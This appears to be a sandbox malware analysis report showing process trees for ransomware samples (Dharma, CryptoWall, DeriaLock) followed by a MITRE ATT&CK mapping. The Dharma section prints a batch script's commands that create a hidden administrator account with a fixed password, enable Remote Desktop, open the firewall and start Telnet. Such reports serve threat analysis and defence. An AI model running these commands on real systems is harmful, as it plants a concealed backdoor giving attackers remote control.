  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
  2⤵
  PID:4724
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:1
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8
  2⤵
  PID:3776
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4416
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5376 /prefetch:8
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6076 /prefetch:8
  2⤵
  PID:4968
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5924 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1448 /prefetch:1
  2⤵
  PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3212 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4840 /prefetch:1
  2⤵
  PID:2976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:1
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5064 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
  2⤵
  PID:4344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
  2⤵
  PID:4224
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5912 /prefetch:8
  2⤵
  PID:1204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6224 /prefetch:2
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6280 /prefetch:1
  2⤵
  PID:3176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5636 /prefetch:8
  2⤵
  PID:3616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:4068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4780 /prefetch:8
  2⤵
  PID:832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  PID:4892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2180,8475017557779975513,3284115690102242996,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3128 /prefetch:8
  2⤵
  PID:2948
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Executes dropped EXE
  PID:4260
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5032
- - C:\Users\Admin\Downloads\ac\nc123.exe
    "C:\Users\Admin\Downloads\ac\nc123.exe"
    3⤵
    - Executes dropped EXE
    PID:2268
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:1476
- - C:\Users\Admin\Downloads\ac\mssql.exe
    "C:\Users\Admin\Downloads\ac\mssql.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:2252
- - C:\Users\Admin\Downloads\ac\mssql2.exe
    "C:\Users\Admin\Downloads\ac\mssql2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:5080
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
    3⤵
    PID:3744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      4⤵
      PID:3856
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        
        PID:3256
  - - C:\Windows\SysWOW64\net.exe
      net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:4568
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        
        PID:4572
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators systembackup /add
      4⤵
      PID:412
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators systembackup /add
        5⤵
        
        PID:2144
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
      4⤵
      PID:216
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        5⤵
        
        PID:1220
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        
        PID:5016
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" systembackup /add
      4⤵
      PID:3024
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
        5⤵
        
        PID:1676
  - - C:\Windows\SysWOW64\net.exe
      net accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:3972
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        
        PID:992
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
      4⤵
      PID:1116
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
      4⤵
      PID:3736
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
      4⤵
      PID:672
  - - C:\Windows\SysWOW64\attrib.exe
      attrib C:\users\systembackup +r +a +s +h
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1040
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 3389 "Remote Desktop"
      4⤵
      Modifies Windows Firewall
      PID:4864
  - - C:\Windows\SysWOW64\sc.exe
      sc config tlntsvr start=auto
      4⤵
      Launches sc.exe
      PID:2256
  - - C:\Windows\SysWOW64\net.exe
      net start Telnet
      4⤵
      PID:2484
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start Telnet
        5⤵
        
        PID:3952
- - C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
    "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of SetWindowsHookEx
    PID:4452
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Executes dropped EXE
  PID:4824

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4880

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3340

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4340

C:\Users\Admin\Downloads\CryptoWall.exe
"C:\Users\Admin\Downloads\CryptoWall.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:2820
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\syswow64\explorer.exe"
  2⤵
  - Drops startup file
  - Adds Run key to start application
  - Suspicious behavior: MapViewOfSection
  PID:5052
- - C:\Windows\SysWOW64\svchost.exe
    -k netsvcs
    3⤵
    PID:2488

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4892

C:\Users\Admin\Downloads\CryptoWall.exe
"C:\Users\Admin\Downloads\CryptoWall.exe"
1⤵
- Executes dropped EXE
PID:400

C:\Users\Admin\Downloads\CryptoWall.exe
"C:\Users\Admin\Downloads\CryptoWall.exe"
1⤵
- Executes dropped EXE
PID:4492

C:\Users\Admin\Downloads\CryptoWall.exe
"C:\Users\Admin\Downloads\CryptoWall.exe"
1⤵
- Executes dropped EXE
PID:1752

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2780

C:\Users\Admin\Downloads\DeriaLock.exe
"C:\Users\Admin\Downloads\DeriaLock.exe"
1⤵
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3192

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:900

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {9BA05972-F6A8-11CF-A442-00A0C90A8F39} -Embedding
1⤵
PID:2944

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{682159d9-c321-47ca-b3f1-30e36b2ec8b9} -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:3644

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
1⤵
PID:4324

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
- Modifies registry class
PID:5052

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery